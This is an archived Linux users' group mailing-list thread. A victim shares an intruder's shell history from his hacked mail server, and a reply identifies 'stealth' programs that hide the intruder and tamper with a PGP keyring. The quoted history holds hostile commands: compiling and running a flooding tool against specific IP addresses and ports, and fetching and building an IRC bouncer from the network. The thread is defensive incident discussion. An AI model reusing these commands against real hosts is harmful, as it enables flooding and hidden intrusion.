|
[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]
|
Re: [PLUG] my wacko email server
|
I did a little searching, that doesn't look good. I found two stealth.c
programs, one looks like it removes entries from utmp so as to hide the
thug, the other appears to do some bad stuff with your pgp key ring.
Joel
Michael Whitman wrote:
>
> My email server went crazy last night, according to my isp, sending
> something lik 3000 packets every 2 seconds to ip address
> 216.87.212.162. Doing a grep on that address I got this response
> /home/squ/.bash_history:./stealth 216.87.212.162 7
>
> Here is the content of that file... looks loke bnc (an IRC program I
> think) was installed - what is stealth?
>
> Looks like i was hacked? Any help with interpreting what went on would be
> appreciated.
>
> w
> w
> w
> ftp
> l
> w
> ls
> ftp
> gcc -o stealth stealth.c
> ./stealth 207.202.129.211 1234
> ./stealth 206.161.205.30 225
> ls
> ./stealth 207.179.81.70 6668
> ls
> ./stealth 204.156.12.50 6667
> ./stealth 192.114.47.10 6667
> ls
> ./stealth 213.9.19.30 6668
> ./stealth 204.126.2.47 1
> ./stealth 216.123.178.4 1
> ls
> w
> lynx http://ftp.loxinfo.co.th/pub/unix/irc/bnc2.6.2.tar.gz
> ls
> gunzip bnc2.6.2.tar.gz
> tar -vxf bnc2.6.2.tar
> cd bnc2.6.2
> make
> pico example.conf
> ./bnc example.conf
> ls
> ./stealth 216.87.212.162 7
>
> -Mike
>
> Michael P. Whitman
> Programmer
> LAW.com
>
> mailto:michaelw@palawnet.com
>
> ______________________________________________________________________
> Philadelphia Linux Users Group - http://plug.nothinbut.net
> Announcements - http://lists.nothinbut.net/mail/listinfo/plug-announce
> General Discussion - http://lists.nothinbut.net/mail/listinfo/plug
______________________________________________________________________
Philadelphia Linux Users Group - http://plug.nothinbut.net
Announcements - http://lists.nothinbut.net/mail/listinfo/plug-announce
General Discussion - http://lists.nothinbut.net/mail/listinfo/plug
|
|